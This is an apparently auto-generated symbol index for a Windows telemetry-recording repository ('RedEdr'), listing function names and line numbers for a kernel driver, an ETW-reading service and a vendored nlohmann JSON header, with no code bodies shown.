  function PVOID (line 250) | PVOID CustomGetProcAddress(PVOID pModuleBase, UNICODE_STRING functionNam...
  function KapcInjectDll (line 293) | int KapcInjectDll(IN PUNICODE_STRING ImageName, IN HANDLE ProcessId, IN ...

FILE: RedEdrDriver/kcallbacks.c
  type PROCESS_LOGGING_INFORMATION (line 48) | typedef union _PROCESS_LOGGING_INFORMATION {
  function BOOLEAN (line 65) | static BOOLEAN EnableProcessTelemetryLogging(PEPROCESS Process) {
  function LogProcessTelemetryLoggingFlags (line 124) | static void LogProcessTelemetryLoggingFlags(PEPROCESS Process, HANDLE pi...
  function VOID (line 182) | VOID EnableTelemetryLoggingForProcessByName(PCWSTR targetName) {
  function InitCallbacks (line 275) | int InitCallbacks() {
  function UninitCallbacks (line 297) | void UninitCallbacks() {
  function CreateProcessNotifyRoutine (line 302) | void CreateProcessNotifyRoutine(PEPROCESS process, HANDLE pid, PPS_CREAT...
  function CreateThreadNotifyRoutine (line 415) | void CreateThreadNotifyRoutine(HANDLE ProcessId, HANDLE ThreadId, BOOLEA...
  function LoadImageNotifyRoutine (line 439) | void LoadImageNotifyRoutine(PUNICODE_STRING FullImageName, HANDLE Proces...
  type TD_CALL_CONTEXT (line 492) | typedef struct _TD_CALL_CONTEXT
  function TdSetCallContext (line 502) | void TdSetCallContext(
  function OB_PREOP_CALLBACK_STATUS (line 531) | OB_PREOP_CALLBACK_STATUS CBTdPreOperationCallback(

FILE: RedEdrDriver/kcallbacks.h
  type TD_CALLBACK_PARAMETERS (line 12) | typedef struct _TD_CALLBACK_PARAMETERS {
  type TD_CALLBACK_REGISTRATION (line 17) | typedef struct _TD_CALLBACK_REGISTRATION {

FILE: RedEdrDriver/settings.c
  function init_settings (line 8) | void init_settings() {
  function print_settings (line 24) | void print_settings() {

FILE: RedEdrDriver/settings.h
  type Settings (line 7) | typedef struct _Settings{

FILE: RedEdrDriver/upipe.c
  function InitializePipe (line 17) | void InitializePipe() {
  function CleanupPipe (line 23) | void CleanupPipe() {
  function IsUserspacePipeConnected (line 28) | int IsUserspacePipeConnected() {
  function LogEvent (line 39) | int LogEvent(char* message) {
  function DisconnectUserspacePipe (line 93) | void DisconnectUserspacePipe() {
  function ConnectUserspacePipe (line 110) | int ConnectUserspacePipe() {

FILE: RedEdrDriver/utils.c
  function LOG_A (line 9) | void LOG_A(int severity, const char* format, ...)
  function IsSubstringInUnicodeString (line 29) | int IsSubstringInUnicodeString(PUNICODE_STRING pDestString, PCWSTR pSubS...
  function Unicodestring2wcharAlloc (line 50) | void Unicodestring2wcharAlloc(const UNICODE_STRING* ustr, wchar_t* dest,...
  function NTSTATUS (line 65) | NTSTATUS WcharToAscii(const wchar_t* wideStr, SIZE_T wideLength, char* a...
  function JsonEscape (line 87) | void JsonEscape(char* str, size_t buffer_size) {

FILE: RedEdrPplService/RedEdrPplService.cpp
  function ShutdownService (line 15) | void ShutdownService() {
  function VOID (line 42) | VOID WINAPI ServiceCtrlHandler(DWORD ctrlCode)
  function VOID (line 66) | VOID WINAPI ServiceMain(DWORD argc, LPTSTR* argv)
  function DWORD (line 134) | DWORD ServiceEntry()
  function main (line 154) | int main(INT argc, CHAR** argv)

FILE: RedEdrPplService/control.cpp
  function DWORD (line 22) | DWORD WINAPI ServiceControlPipeThread(LPVOID param) {
  function StartControl (line 106) | void StartControl() {
  function StopControl (line 122) | void StopControl() {
  function rededr_remove_service (line 148) | void rededr_remove_service() {
  function DWORD (line 158) | DWORD start_child_process(wchar_t* childCMD)

FILE: RedEdrPplService/emitter.cpp
  function BOOL (line 11) | BOOL ConnectEmitterPipe() {
  function SendEmitterPipe (line 22) | void SendEmitterPipe(char* buffer) {
  function DisconnectEmitterPipe (line 27) | void DisconnectEmitterPipe() {

FILE: RedEdrPplService/etwtihandler.cpp
  function SetDefenderTraceConfig (line 22) | void SetDefenderTraceConfig(BOOL enabled, const std::vector<std::string>...
  function event_callback (line 27) | void event_callback(const EVENT_RECORD& record, const krabs::trace_conte...
  function event_callback_defendertrace (line 61) | void event_callback_defendertrace(const EVENT_RECORD& record, const krab...

FILE: RedEdrPplService/etwtireader.cpp
  function StartEtwtiReader (line 15) | void StartEtwtiReader() {
  function ShutdownEtwtiReader (line 71) | void ShutdownEtwtiReader() {

FILE: RedEdrPplService/logging.cpp
  function InitializeFileLogging (line 18) | static void InitializeFileLogging() {
  function WriteToLogFile (line 39) | static void WriteToLogFile(const char* message) {
  function LOG_A (line 87) | void LOG_A(int verbosity, const char* format, ...)
  function LOG_W (line 101) | void LOG_W(int verbosity, const wchar_t* format, ...)
  function CleanupFileLogging (line 120) | void CleanupFileLogging() {

FILE: RedEdrPplService/uthash.h
  type UT_hash_bucket (line 1072) | typedef struct UT_hash_bucket {
  type UT_hash_table (line 1096) | typedef struct UT_hash_table {
  type UT_hash_handle (line 1129) | typedef struct UT_hash_handle {

FILE: RedEdrShared/etw_krabs.cpp
  function KrabsEtwEventToJsonStr (line 12) | nlohmann::json KrabsEtwEventToJsonStr(const EVENT_RECORD& record, krabs:...

FILE: RedEdrShared/json.hpp
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 247) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function NLOHMANN_JSON_NAMESPACE_END (line 258) | NLOHMANN_JSON_NAMESPACE_END
  type would_call_std_ (line 2814) | struct would_call_std_
  type value_t (line 2872) | enum class value_t : std::uint8_t
  function NLOHMANN_JSON_NAMESPACE_END (line 2937) | NLOHMANN_JSON_NAMESPACE_END
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 3031) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 3077) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 3268) | NLOHMANN_JSON_NAMESPACE_BEGIN
  class json_pointer (line 3417) | class json_pointer
  type ordered_map (line 3428) | struct ordered_map
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 3439) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 4245) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function NLOHMANN_JSON_NAMESPACE_END (line 4374) | NLOHMANN_JSON_NAMESPACE_END
  function NLOHMANN_JSON_NAMESPACE_END (line 4608) | NLOHMANN_JSON_NAMESPACE_END
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 4654) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 4662) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 4677) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 5192) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function NLOHMANN_JSON_NAMESPACE_END (line 5376) | NLOHMANN_JSON_NAMESPACE_END
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 5425) | NLOHMANN_JSON_NAMESPACE_BEGIN
  type adl_serializer (line 5853) | struct adl_serializer
    method from_json (line 5858) | static auto from_json(BasicJsonType&& j, TargetType& val) noexcept(
    method from_json (line 5868) | static auto from_json(BasicJsonType&& j) noexcept(
    method to_json (line 5878) | static auto to_json(BasicJsonType& j, TargetType&& val) noexcept(
  function set_subtype (line 5964) | void set_subtype(subtype_type subtype_) noexcept
  function subtype_type (line 5972) | constexpr subtype_type subtype() const noexcept
  function has_subtype (line 5979) | constexpr bool has_subtype() const noexcept
  function clear_subtype (line 5986) | void clear_subtype() noexcept
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 6025) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 6197) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function json_sax_dom_parser (line 6844) | explicit json_sax_dom_parser(BasicJsonType& r, const bool allow_exceptio...
  function json_sax_dom_parser (line 6850) | json_sax_dom_parser(const json_sax_dom_parser&) = delete;
  function json_sax_dom_parser (line 6851) | json_sax_dom_parser(json_sax_dom_parser&&) = default;
  function null (line 6856) | bool null()
  function boolean (line 6862) | bool boolean(bool val)
  function number_integer (line 6868) | bool number_integer(number_integer_t val)
  function number_unsigned (line 6874) | bool number_unsigned(number_unsigned_t val)
  function number_float (line 6880) | bool number_float(number_float_t val, const string_t& /*unused*/)
  function string (line 6886) | bool string(string_t& val)
  function binary (line 6892) | bool binary(binary_t& val)
  function start_object (line 6898) | bool start_object(std::size_t len)
  function key (line 6910) | bool key(string_t& val)
  function end_object (line 6920) | bool end_object()
  function start_array (line 6930) | bool start_array(std::size_t len)
  function end_array (line 6942) | bool end_array()
  function parse_error (line 6953) | bool parse_error(std::size_t /*unused*/, const std::string& /*unused*/,
  function is_errored (line 6965) | constexpr bool is_errored() const
  class json_sax_dom_callback_parser (line 7014) | class json_sax_dom_callback_parser
    method json_sax_dom_callback_parser (line 7025) | json_sax_dom_callback_parser(BasicJsonType& r,
    method json_sax_dom_callback_parser (line 7034) | json_sax_dom_callback_parser(const json_sax_dom_callback_parser&) = de...
    method json_sax_dom_callback_parser (line 7035) | json_sax_dom_callback_parser(json_sax_dom_callback_parser&&) = default;
    method json_sax_dom_callback_parser (line 7036) | json_sax_dom_callback_parser& operator=(const json_sax_dom_callback_pa...
    method json_sax_dom_callback_parser (line 7037) | json_sax_dom_callback_parser& operator=(json_sax_dom_callback_parser&&...
    method null (line 7040) | bool null()
    method boolean (line 7046) | bool boolean(bool val)
    method number_integer (line 7052) | bool number_integer(number_integer_t val)
    method number_unsigned (line 7058) | bool number_unsigned(number_unsigned_t val)
    method number_float (line 7064) | bool number_float(number_float_t val, const string_t& /*unused*/)
    method string (line 7070) | bool string(string_t& val)
    method binary (line 7076) | bool binary(binary_t& val)
    method start_object (line 7082) | bool start_object(std::size_t len)
    method key (line 7100) | bool key(string_t& val)
    method end_object (line 7117) | bool end_object()
    method start_array (line 7153) | bool start_array(std::size_t len)
    method end_array (line 7170) | bool end_array()
    method parse_error (line 7203) | bool parse_error(std::size_t /*unused*/, const std::string& /*unused*/,
    method is_errored (line 7215) | constexpr bool is_errored() const
    method handle_value (line 7237) | std::pair<bool, BasicJsonType*> handle_value(Value&& v, const bool ski...
  class json_sax_acceptor (line 7321) | class json_sax_acceptor
    method null (line 7330) | bool null()
    method boolean (line 7335) | bool boolean(bool /*unused*/)
    method number_integer (line 7340) | bool number_integer(number_integer_t /*unused*/)
    method number_unsigned (line 7345) | bool number_unsigned(number_unsigned_t /*unused*/)
    method number_float (line 7350) | bool number_float(number_float_t /*unused*/, const string_t& /*unused*/)
    method string (line 7355) | bool string(string_t& /*unused*/)
    method binary (line 7360) | bool binary(binary_t& /*unused*/)
    method start_object (line 7365) | bool start_object(std::size_t /*unused*/ = static_cast<std::size_t>(-1))
    method key (line 7370) | bool key(string_t& /*unused*/)
    method end_object (line 7375) | bool end_object()
    method start_array (line 7380) | bool start_array(std::size_t /*unused*/ = static_cast<std::size_t>(-1))
    method end_array (line 7385) | bool end_array()
    method parse_error (line 7390) | bool parse_error(std::size_t /*unused*/, const std::string& /*unused*/...
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 7429) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function reset (line 8725) | void reset() noexcept
  function char_int_type (line 8742) | char_int_type get()
  function unget (line 8779) | void unget()
  function add (line 8806) | void add(char_int_type c)
  function number_unsigned_t (line 8823) | constexpr number_unsigned_t get_number_unsigned() const noexcept
  function number_float_t (line 8829) | constexpr number_float_t get_number_float() const noexcept
  function string_t (line 8835) | string_t& get_string()
  function position_t (line 8845) | constexpr position_t get_position() const noexcept
  function get_token_string (line 8853) | std::string get_token_string() const
  function JSON_HEDLEY_RETURNS_NON_NULL (line 8877) | JSON_HEDLEY_RETURNS_NON_NULL
  function skip_bom (line 8891) | bool skip_bom()
  function skip_whitespace (line 8905) | void skip_whitespace()
  function token_type (line 8913) | token_type scan()
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 9062) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function NLOHMANN_JSON_NAMESPACE_END (line 9202) | NLOHMANN_JSON_NAMESPACE_END
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 12226) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 12750) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function NLOHMANN_JSON_NAMESPACE_END (line 12866) | NLOHMANN_JSON_NAMESPACE_END
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 12921) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function pointer (line 13225) | pointer operator->() const
  function iter_impl (line 13267) | iter_impl operator++(int)& // NOLINT(cert-dcl21-cpp)
  function iter_impl (line 13278) | iter_impl& operator++()
  function iter_impl (line 13318) | iter_impl operator--(int)& // NOLINT(cert-dcl21-cpp)
  function iter_impl (line 13329) | iter_impl& operator--()
  function iter_impl (line 13477) | iter_impl& operator+=(difference_type i)
  function iter_impl (line 13514) | iter_impl& operator-=(difference_type i)
  function iter_impl (line 13523) | iter_impl operator+(difference_type i) const
  function friend (line 13534) | friend iter_impl operator+(difference_type i, const iter_impl& it)
  function iter_impl (line 13545) | iter_impl operator-(difference_type i) const
  function difference_type (line 13556) | difference_type operator-(const iter_impl& other) const
  function reference (line 13585) | reference operator[](difference_type n) const
  function reference (line 13639) | reference value() const
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 13674) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 13808) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 13869) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function NLOHMANN_BASIC_JSON_TPL_DECLARATION (line 13889) | NLOHMANN_BASIC_JSON_TPL_DECLARATION
  function json_pointer (line 13901) | explicit json_pointer(const string_t& s = "")
  function string_t (line 13908) | string_t to_string() const
  function friend (line 13929) | friend std::ostream& operator<<(std::ostream& o, const json_pointer& ptr)
  function json_pointer (line 13938) | json_pointer& operator/=(const json_pointer& ptr)
  function json_pointer (line 13948) | json_pointer& operator/=(string_t token)
  function json_pointer (line 13956) | json_pointer& operator/=(std::size_t array_idx)
  function friend (line 13963) | friend json_pointer operator/(const json_pointer& lhs,
  function friend (line 13971) | friend json_pointer operator/(const json_pointer& lhs, string_t token) /...
  function friend (line 13978) | friend json_pointer operator/(const json_pointer& lhs, std::size_t array...
  function json_pointer (line 13985) | json_pointer parent_pointer() const
  function pop_back (line 13999) | void pop_back()
  function string_t (line 14011) | const string_t& back() const
  function push_back (line 14023) | void push_back(const string_t& token)
  function push_back (line 14030) | void push_back(string_t&& token)
  function empty (line 14037) | bool empty() const noexcept
  function BasicJsonType (line 14114) | BasicJsonType& get_and_create(BasicJsonType& j) const
  function BasicJsonType (line 14194) | BasicJsonType& get_unchecked(BasicJsonType* ptr) const
  function BasicJsonType (line 14262) | BasicJsonType& get_checked(BasicJsonType* ptr) const
  function BasicJsonType (line 14320) | const BasicJsonType& get_unchecked(const BasicJsonType* ptr) const
  function BasicJsonType (line 14369) | const BasicJsonType& get_checked(const BasicJsonType* ptr) const
  function contains (line 14418) | bool contains(const BasicJsonType* ptr) const
  function split (line 14506) | static std::vector<string_t> split(const string_t& reference_string)
  function BasicJsonType (line 14646) | static BasicJsonType
  function convert (line 14675) | json_pointer<string_t> convert() const&
  function convert (line 14682) | json_pointer<string_t> convert()&&
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 14849) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 14978) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function NLOHMANN_JSON_NAMESPACE_END (line 15106) | NLOHMANN_JSON_NAMESPACE_END
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 16973) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function NLOHMANN_JSON_NAMESPACE_END (line 18070) | NLOHMANN_JSON_NAMESPACE_END
  function hex_bytes (line 18731) | static std::string hex_bytes(std::uint8_t byte)
  function is_negative_number (line 18742) | bool is_negative_number(NumberType x)
  function is_negative_number (line 18748) | bool is_negative_number(NumberType /*unused*/)
  function dump_integer (line 18768) | void dump_integer(NumberType x)
  function dump_float (line 18853) | void dump_float(number_float_t x)
  function dump_float (line 18874) | void dump_float(number_float_t x, std::true_type /*is_ieee_single_or_dou...
  function dump_float (line 18882) | void dump_float(number_float_t x, std::false_type /*is_ieee_single_or_do...
  function decode (line 18954) | static std::uint8_t decode(std::uint8_t& state, std::uint32_t& codep, co...
  function number_unsigned_t (line 18994) | number_unsigned_t remove_sign(number_unsigned_t x)
  function number_unsigned_t (line 19009) | inline number_unsigned_t remove_sign(number_integer_t x) noexcept
  function ordered_map (line 19096) | ordered_map() noexcept(noexcept(Container())) : Container{} {}
  function ordered_map (line 19097) | explicit ordered_map(const Allocator& alloc) noexcept(noexcept(Container...
  function ordered_map (line 19099) | ordered_map(It first, It last, const Allocator& alloc = Allocator())
  function ordered_map (line 19102) | ordered_map(std::initializer_list<value_type> init, const Allocator& all...
  function emplace (line 19106) | std::pair<iterator, bool> emplace(const key_type& key, T&& t)
  function emplace (line 19121) | std::pair<iterator, bool> emplace(KeyType&& key, T&& t)
  function T (line 19134) | T& operator[](const key_type& key)
  function T (line 19141) | T& operator[](KeyType&& key)
  function T (line 19146) | const T& operator[](const key_type& key) const
  function T (line 19153) | const T& operator[](KeyType&& key) const
  function T (line 19158) | T& at(const key_type& key)
  function T (line 19173) | T& at(KeyType&& key) // NOLINT(cppcoreguidelines-missing-std-forward)
  function T (line 19186) | const T& at(const key_type& key) const
  function T (line 19201) | const T& at(KeyType&& key) const // NOLINT(cppcoreguidelines-missing-std...
  function size_type (line 19214) | size_type erase(const key_type& key)
  function size_type (line 19235) | size_type erase(KeyType&& key) // NOLINT(cppcoreguidelines-missing-std-f...
  function iterator (line 19254) | iterator erase(iterator pos)
  function iterator (line 19259) | iterator erase(iterator first, iterator last)
  function size_type (line 19312) | size_type count(const key_type& key) const
  function size_type (line 19326) | size_type count(KeyType&& key) const // NOLINT(cppcoreguidelines-missing...
  function iterator (line 19338) | iterator find(const key_type& key)
  function iterator (line 19352) | iterator find(KeyType&& key) // NOLINT(cppcoreguidelines-missing-std-for...
  function const_iterator (line 19364) | const_iterator find(const key_type& key) const
  function insert (line 19376) | std::pair<iterator, bool> insert(value_type&& value)
  function insert (line 19381) | std::pair<iterator, bool> insert(const value_type& value)
  function insert (line 19399) | void insert(InputIt first, InputIt last)
  function NLOHMANN_JSON_NAMESPACE_BEGIN (line 19426) | NLOHMANN_JSON_NAMESPACE_BEGIN
  function set_parents (line 20053) | void set_parents()
  function iterator (line 20090) | iterator set_parents(iterator it, typename iterator::difference_type cou...
  function reference (line 20103) | reference set_parent(reference j, std::size_t old_capacity = static_cast...
  function basic_json (line 20165) | basic_json(const value_t v)
  function basic_json (line 20173) | basic_json(std::nullptr_t = nullptr) noexcept // NOLINT(bugprone-excepti...
  function basic_json (line 20185) | basic_json(CompatibleType&& val) noexcept(noexcept( // NOLINT(bugprone-f...
  function basic_json (line 20199) | basic_json(const BasicJsonType& val)
  function basic_json (line 20252) | basic_json(initializer_list_t init,
  function JSON_HEDLEY_WARN_UNUSED_RESULT (line 20310) | JSON_HEDLEY_WARN_UNUSED_RESULT
  function JSON_HEDLEY_WARN_UNUSED_RESULT (line 20321) | JSON_HEDLEY_WARN_UNUSED_RESULT
  function JSON_HEDLEY_WARN_UNUSED_RESULT (line 20332) | JSON_HEDLEY_WARN_UNUSED_RESULT
  function JSON_HEDLEY_WARN_UNUSED_RESULT (line 20343) | JSON_HEDLEY_WARN_UNUSED_RESULT
  function JSON_HEDLEY_WARN_UNUSED_RESULT (line 20354) | JSON_HEDLEY_WARN_UNUSED_RESULT
  function JSON_HEDLEY_WARN_UNUSED_RESULT (line 20362) | JSON_HEDLEY_WARN_UNUSED_RESULT
  function basic_json (line 20370) | basic_json(size_type cnt, const basic_json& val) :
  function basic_json (line 20382) | basic_json(InputIT first, InputIT last)
  function basic_json (line 20491) | basic_json(const JsonRef& ref) : basic_json(ref.moved_or_copied()) {}
  function basic_json (line 20495) | basic_json(const basic_json& other)
  function basic_json (line 20564) | basic_json(basic_json&& other) noexcept
  function basic_json (line 20581) | basic_json& operator=(basic_json other) noexcept (
  function value_t (line 20644) | constexpr value_t type() const noexcept
  function is_primitive (line 20651) | constexpr bool is_primitive() const noexcept
  function is_structured (line 20658) | constexpr bool is_structured() const noexcept
  function is_null (line 20665) | constexpr bool is_null() const noexcept
  function is_boolean (line 20672) | constexpr bool is_boolean() const noexcept
  function is_number (line 20679) | constexpr bool is_number() const noexcept
  function is_number_integer (line 20686) | constexpr bool is_number_integer() const noexcept
  function is_number_unsigned (line 20693) | constexpr bool is_number_unsigned() const noexcept
  function is_number_float (line 20700) | constexpr bool is_number_float() const noexcept
  function is_object (line 20707) | constexpr bool is_object() const noexcept
  function is_array (line 20714) | constexpr bool is_array() const noexcept
  function is_string (line 20721) | constexpr bool is_string() const noexcept
  function is_binary (line 20728) | constexpr bool is_binary() const noexcept
  function is_discarded (line 20735) | constexpr bool is_discarded() const noexcept
  function object_t (line 20766) | object_t* get_impl_ptr(object_t* /*unused*/) noexcept
  function object_t (line 20772) | constexpr const object_t* get_impl_ptr(const object_t* /*unused*/) const...
  function array_t (line 20778) | array_t* get_impl_ptr(array_t* /*unused*/) noexcept
  function array_t (line 20784) | constexpr const array_t* get_impl_ptr(const array_t* /*unused*/) const n...
  function string_t (line 20790) | string_t* get_impl_ptr(string_t* /*unused*/) noexcept
  function string_t (line 20796) | constexpr const string_t* get_impl_ptr(const string_t* /*unused*/) const...
  function boolean_t (line 20802) | boolean_t* get_impl_ptr(boolean_t* /*unused*/) noexcept
  function boolean_t (line 20808) | constexpr const boolean_t* get_impl_ptr(const boolean_t* /*unused*/) con...
  function number_integer_t (line 20814) | number_integer_t* get_impl_ptr(number_integer_t* /*unused*/) noexcept
  function number_integer_t (line 20820) | constexpr const number_integer_t* get_impl_ptr(const number_integer_t* /...
  function number_unsigned_t (line 20826) | number_unsigned_t* get_impl_ptr(number_unsigned_t* /*unused*/) noexcept
  function number_unsigned_t (line 20832) | constexpr const number_unsigned_t* get_impl_ptr(const number_unsigned_t*...
  function number_float_t (line 20838) | number_float_t* get_impl_ptr(number_float_t* /*unused*/) noexcept
  function number_float_t (line 20844) | constexpr const number_float_t* get_impl_ptr(const number_float_t* /*unu...
  function binary_t (line 20850) | binary_t* get_impl_ptr(binary_t* /*unused*/) noexcept
  function binary_t (line 20856) | constexpr const binary_t* get_impl_ptr(const binary_t* /*unused*/) const...
  function ReferenceType (line 20873) | static ReferenceType get_ref_impl(ThisType& obj)
  function get_ptr (line 20906) | constexpr auto get_ptr() const noexcept -> decltype(std::declval<const b...
  function ValueType (line 20998) | ValueType get_impl(detail::priority_tag<1> /*unused*/) const noexcept(no...
  function BasicJsonType (line 21023) | BasicJsonType get_impl(detail::priority_tag<2> /*unused*/) const
  function basic_json (line 21046) | basic_json get_impl(detail::priority_tag<3> /*unused*/) const
  function get_impl (line 21059) | constexpr auto get_impl(detail::priority_tag<4> /*unused*/) const noexcept
  function get (line 21135) | auto get() noexcept -> decltype(std::declval<basic_json_t&>().template g...
  function ValueType (line 21148) | ValueType& get_to(ValueType& v) const noexcept(noexcept(
  function ValueType (line 21161) | ValueType& get_to(ValueType& v) const
  function Array (line 21172) | Array get_to(T(&v)[N]) const // NOLINT(cppcoreguidelines-avoid-c-arrays,...
  function ReferenceType (line 21184) | ReferenceType get_ref()
  function ReferenceType (line 21195) | ReferenceType get_ref() const
  function binary_t (line 21254) | binary_t& get_binary()
  function binary_t (line 21266) | const binary_t& get_binary() const
  function reference (line 21288) | reference at(size_type idx)
  function const_reference (line 21311) | const_reference at(size_type idx) const
  function reference (line 21334) | reference at(const typename object_t::key_type& key)
  function reference (line 21354) | reference at(KeyType&& key)
  function const_reference (line 21372) | const_reference at(const typename object_t::key_type& key) const
  function const_reference (line 21392) | const_reference at(KeyType&& key) const
  function reference (line 21410) | reference operator[](size_type idx)
  function const_reference (line 21456) | const_reference operator[](size_type idx) const
  function reference (line 21469) | reference operator[](typename object_t::key_type key)
  function const_reference (line 21491) | const_reference operator[](const typename object_t::key_type& key) const
  function reference (line 21507) | reference operator[](T* key)
  function const_reference (line 21513) | const_reference operator[](T* key) const
  function reference (line 21522) | reference operator[](KeyType&& key)
  function const_reference (line 21546) | const_reference operator[](KeyType&& key) const
  class ValueType (line 21572) | class ValueType
  function ReturnType (line 21601) | ReturnType value(const typename object_t::key_type& key, ValueType&& def...
  function ValueType (line 21627) | ValueType value(KeyType&& key, const ValueType& default_value) const
  function ReturnType (line 21654) | ReturnType value(KeyType&& key, ValueType&& default_value) const
  function ValueType (line 21677) | ValueType value(const json_pointer& ptr, const ValueType& default_value)...
  function ReturnType (line 21702) | ReturnType value(const json_pointer& ptr, ValueType&& default_value) const
  function ValueType (line 21726) | ValueType value(const ::nlohmann::json_pointer<BasicJsonType>& ptr, cons...
  function ReturnType (line 21737) | ReturnType value(const ::nlohmann::json_pointer<BasicJsonType>& ptr, Val...
  function reference (line 21744) | reference front()
  function const_reference (line 21751) | const_reference front() const
  function reference (line 21758) | reference back()
  function const_reference (line 21767) | const_reference back() const
  function IteratorType (line 21779) | IteratorType erase(IteratorType pos)
  function IteratorType (line 21849) | IteratorType erase(IteratorType first, IteratorType last)
  function erase_internal (line 21917) | private:
  function size_type (line 21933) | size_type erase_internal(KeyType&& key)
  function size_type (line 21965) | size_type erase(KeyType&& key)
  function erase (line 21972) | void erase(const size_type idx)
  function iterator (line 22001) | iterator find(const typename object_t::key_type& key)
  function const_iterator (line 22015) | const_iterator find(const typename object_t::key_type& key) const
  function iterator (line 22031) | iterator find(KeyType&& key)
  function const_iterator (line 22047) | const_iterator find(KeyType&& key) const
  function size_type (line 22061) | size_type count(const typename object_t::key_type& key) const
  function size_type (line 22071) | size_type count(KeyType&& key) const
  function contains (line 22079) | bool contains(const typename object_t::key_type& key) const
  function contains (line 22088) | bool contains(KeyType&& key) const
  function contains (line 22095) | bool contains(const json_pointer& ptr) const
  function contains (line 22102) | bool contains(const typename ::nlohmann::json_pointer<BasicJsonType>& pt...
  function iterator (line 22118) | iterator begin() noexcept
  function const_iterator (line 22127) | const_iterator begin() const noexcept
  function const_iterator (line 22134) | const_iterator cbegin() const noexcept
  function iterator (line 22143) | iterator end() noexcept
  function const_iterator (line 22152) | const_iterator end() const noexcept
  function const_iterator (line 22159) | const_iterator cend() const noexcept
  function reverse_iterator (line 22168) | reverse_iterator rbegin() noexcept
  function const_reverse_iterator (line 22175) | const_reverse_iterator rbegin() const noexcept
  function reverse_iterator (line 22182) | reverse_iterator rend() noexcept
  function const_reverse_iterator (line 22189) | const_reverse_iterator rend() const noexcept
  function const_reverse_iterator (line 22196) | const_reverse_iterator crbegin() const noexcept
  function const_reverse_iterator (line 22203) | const_reverse_iterator crend() const noexcept
  function iterator_wrapper (line 22215) | static iteration_proxy<iterator> iterator_wrapper(reference ref) noexcept
  function iterator_wrapper (line 22226) | static iteration_proxy<const_iterator> iterator_wrapper(const_reference ...
  function items (line 22233) | iteration_proxy<iterator> items() noexcept
  function items (line 22240) | iteration_proxy<const_iterator> items() const noexcept
  function empty (line 22256) | bool empty() const noexcept
  function size_type (line 22295) | size_type size() const noexcept
  function size_type (line 22334) | size_type max_size() const noexcept
  function clear (line 22377) | void clear() noexcept
  function push_back (line 22438) | void push_back(basic_json&& val)
  function reference (line 22463) | reference operator+=(basic_json&& val)
  function push_back (line 22471) | void push_back(const basic_json& val)
  function reference (line 22495) | reference operator+=(const basic_json& val)
  function push_back (line 22503) | void push_back(const typename object_t::value_type& val)
  function reference (line 22526) | reference operator+=(const typename object_t::value_type& val)
  function push_back (line 22534) | void push_back(initializer_list_t init)
  function reference (line 22550) | reference operator+=(initializer_list_t init)
  function reference (line 22559) | reference emplace_back(Args&& ... args)
  function emplace (line 22584) | std::pair<iterator, bool> emplace(Args&& ... args)
  function iterator (line 22616) | iterator insert_iterator(const_iterator pos, Args&& ... args)
  function iterator (line 22635) | iterator insert(const_iterator pos, const basic_json& val)
  function iterator (line 22655) | iterator insert(const_iterator pos, basic_json&& val)
  function iterator (line 22662) | iterator insert(const_iterator pos, size_type cnt, const basic_json& val)
  function iterator (line 22682) | iterator insert(const_iterator pos, const_iterator first, const_iterator...
  function iterator (line 22713) | iterator insert(const_iterator pos, initializer_list_t ilist)
  function insert (line 22733) | void insert(const_iterator first, const_iterator last)
  function update (line 22758) | void update(const_reference j, bool merge_objects = false)
  function update (line 22765) | void update(const_iterator first, const_iterator last, bool merge_object...
  function swap (line 22812) | void swap(reference other) noexcept (
  function friend (line 22829) | friend void swap(reference left, reference right) noexcept (
  function swap (line 22841) | void swap(array_t& other) // NOLINT(bugprone-exception-escape,cppcoregui...
  function swap (line 22857) | void swap(object_t& other) // NOLINT(bugprone-exception-escape,cppcoregu...
  function swap (line 22873) | void swap(string_t& other) // NOLINT(bugprone-exception-escape,cppcoregu...
  function swap (line 22889) | void swap(binary_t& other) // NOLINT(bugprone-exception-escape,cppcoregu...
  function swap (line 22905) | void swap(typename binary_t::container_type& other) // NOLINT(bugprone-e...
  function else (line 22994) | else if(compares_unordered(lhs, rhs))\
  function compares_unordered (line 23023) | bool compares_unordered(const_reference rhs, bool inverse = false) const...
